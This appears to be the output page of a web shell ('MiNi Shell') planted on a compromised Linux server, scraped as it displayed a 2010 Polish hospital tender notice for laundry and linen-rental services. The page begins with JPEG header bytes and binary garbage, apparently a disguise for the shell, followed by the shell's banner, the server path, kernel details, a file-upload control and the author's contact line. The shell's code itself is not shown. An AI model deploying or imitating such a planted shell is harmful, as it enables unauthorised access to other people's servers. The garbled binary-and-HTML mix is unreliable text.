JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100126/23178-N-2010.html

<p class="kh_header"><b>Rawa Mazowiecka: Świadczenie usług pralniczych z użyczeniem pościeli i bielizny szpitalnej oraz transportem przedmiotu zamówienia</b><br>
<b>Numer ogłoszenia: 23178 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Warszawska 14, 96-200 Rawa Mazowiecka, woj. łódzkie, tel. 046 8142472 w. 197, faks 046 8142474.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatrawski.pl : Instytucje_ Samodzielny Publiczny Zakład Opieki Zdrowotnej</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pralniczych z użyczeniem pościeli i bielizny szpitalnej oraz transportem przedmiotu zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:
a)	Pranie wodne,
b)	Odkażanie,
c)	Prasowanie i maglowanie,
d)	Krochmalenie,
e)	Drobne naprawy krawieckie,
f)	Sortowanie i pakowanie,
g)	Transport,
h)	Użyczenie pościeli  i bielizny szpitalnej na czas trwania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 93.10.00.00-9, 98.31.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium do niniejszego postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w  art. 22 ust. 1 ustawy  Prawo zamówień publicznych dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2) posiadania wiedzy i doświadczenia,
3) dysponowania odpowiednim  potencjałem technicznym oraz  osobami zdolnymi do wykonywania zamówienia ,
4) sytuacji ekonomicznej i finansowej,
oraz 
 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy oraz spełniający warunki określone w Specyfikacji Istotnych Warunków Zamówienia (siwz).
2.	Wykonawca zobowiązany jest do wykazania spełniania warunków, o których mowa w art. 22 ust. 1 i 2 ustawy oraz braku podstaw do wykluczenia go z powodu  warunków, o których mowa w art. 24 ust. 1 ustawy za pomocą niżej wymienionych dokumentów:
1)	Posiadanie uprawnień (art. 22 ust. 1 pkt. 1 ) - dokument koncesji, zezwolenia lub licencji jeżeli ustawy nakładają obowiązek posiadania takich uprawnień w zakresie prowadzonej działalności,  
2)	Wiedza i doświadczenie (art. 22 ust. 1 pkt 2) - weryfikacja spełniania tego warunku dokonywana będzie  w oparciu o dotychczas realizowane zamówienia. W tym celu każdy z Wykonawców złoży na Załączniku nr 2 siwz wykaz usług (usługa  prania) realizowana w jednostce służby zdrowia (szpital) -  min. 1 usługa-  wykonanych lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z załączonym potwierdzeniem, że usługa ta została wykonana lub jest  wykonywana należycie,
3)	Potencjał techniczny (art. 22 ust. 1 pkt 3) - weryfikacja spełniania tego warunku dokonywana będzie w oparciu o wykaz narzędzi i urządzeń wyposażenia zakładu - sporządzony na załączniku nr 3 siwz,  
4)	Sytuacja ekonomiczna i finansowa (art. 22 ust. 1 pkt 4) weryfikacja spełniania tego warunku dokonywana będzie w oparciu o kserokopię załączonej ważnej  polisy ubezpieczeniowej w zakresie prowadzonej działalności gospodarczej o wartości min. 500. 000,00 zł z  klauzulą ubezpieczenia od ryzyka  przenoszeniu chorób zakaźnych.  
3.	W celu wykazania braku podstaw do wykluczenia  z postępowania o udzielenie zamówienia  Wykonawca składa następujące dokumenty:
1) Oświadczenie o braku podstaw do wykluczenia - załącznik nr 4 siwz
 2) Aktualny odpis  z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania  ofert , 
3) Aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4) Aktualne zaświadczenie  właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub  potwierdzenia, że uzyskał  przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert,
5) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

4.	W celu potwierdzenia, że  oferowane usługi  odpowiadają wymaganiom określonym przez zamawiającego Wykonawca zobowiązany jest złożyć następujące dokumenty:
1)	Pozytywną opinię Stacji Sanitarno - Epidemiologicznej w zakresie środków transportu, które będą wykorzystywane do realizacji usługi - min. na 2 pojazdy, opinia winna zawierać  numery rejestracyjne pojazdów,
2)	Opinia sanitarna wydana przez właściwego Powiatowego Inspektora Sanitarnego  w oparciu o przeprowadzone  kontrole, potwierdzająca  spełnienie wymogów  Rozporządzenia Ministra Zdrowia z dnia 10 listopada 2006r. dot. pralni, w której będzie realizowane zamówienie,
3)	W przypadku pralni dzierżawionej, wynajmowanej, będącej w użyczeniu itp., Wykonawca obowiązany jest podać w ofercie miejsce realizacji usługi oraz tytuł prawny do dysponowania pralnią . Do oferty należy dołączyć kserokopię potwierdzoną za zgodność z oryginałem ewentualnej umowy dzierżawy, najmu, użyczenia itp. Umowa winna być zawarta min. na okres realizacji zamówienia tj. 24 miesiące.

Pralnia Wykonawcy (lub dzierżawiona) musi spełniać wymogi wynikające z rozporządzenia Ministra Zdrowia z dnia 10 listopada 2006r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej 
5.	W przypadku wspólnego ubiegania się Wykonawców o zmówienie będące przedmiotem niniejszego postępowania wymagania dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o zamówienie.
6.	Ocena spełnienia warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania zostanie dokonana w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, których wykaz zamieszczono w pkt. VIII siwz na zasadzie spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1	Formularz oferty wraz ze szczegółowym opisem usługi, oświadczeniem wynikającym z art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz art. 44 ustawy - Załącznik nr 1 siwz.
2	Koncesja, zezwolenie, licencja - o ile dotyczy.
3	Wykaz usług -Załącznik nr 2 siwz.
4	Referencje/potwierdzenie należytego wykonania lub wykonywania zamówienia.
5	Potencjał techniczny - wykaz narzędzi i urządzeń zakładu	 - Załącznik nr 3 siwz.
6	Sytuacja ekonomiczna i finansowa - Kserokopia polisy ubezpieczeniowej (polisa min. 500.000,00 zł).
7	Oświadczenie o braku podstaw do wykluczenia	 - Załącznik nr 4 siwz.
8	Aktualny odpis  z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru,wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania  ofert .
9	Aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10	Aktualne zaświadczenie  właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub  potwierdzenia, że uzyskał  przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert.
11	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
12	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9ustawy, wystawiona  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
13	Pozytywna opinia Stacji Sanitarno - Epidemiologicznej w zakresie środków transportu, które będą wykorzystywane do realizacji usługi - min. na 2 pojazdy. Opinia winna zawierać  numery rejestracyjne pojazdów.
14	Opinia sanitarna wydana przez właściwego Powiatowego Inspektora Sanitarnego w oparciu o przeprowadzone  kontrole, potwierdzająca spełnienie wymogów rozporządzenia Ministra Zdrowia z dnia 10 listopada 2006r. dot. pralni, w której będzie realizowane zamówienie.
15	Kserokopia potwierdzona za zgodność z oryginałem ewentualnej umowy dzierżawy, najmu, użyczenia itp. Pomieszczeń /lokalu pralni - jeżeli dotyczy. Umowa winna być zawarta min. na okres realizacji zamówienia tj. 24 miesiące.
16	Podwykonawstwo -Załącznik nr 5 siwz..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatrawski.pl: Instytucje_ Samodzielny Publiczny Zakład Opieki Zdrowotnej.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej
96 - 200 Rawa Mazowiecka
ul. Warszawska 14
lub pobrać ze strony internetowej wskazanej w pkt. IV.3.1 niniejszego ogłoszenia.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2010 godzina 10:30, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej
96 - 200 Rawa Mazowiecka
ul. Warszawska 14
SEKRETARIAT SP ZOZ.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com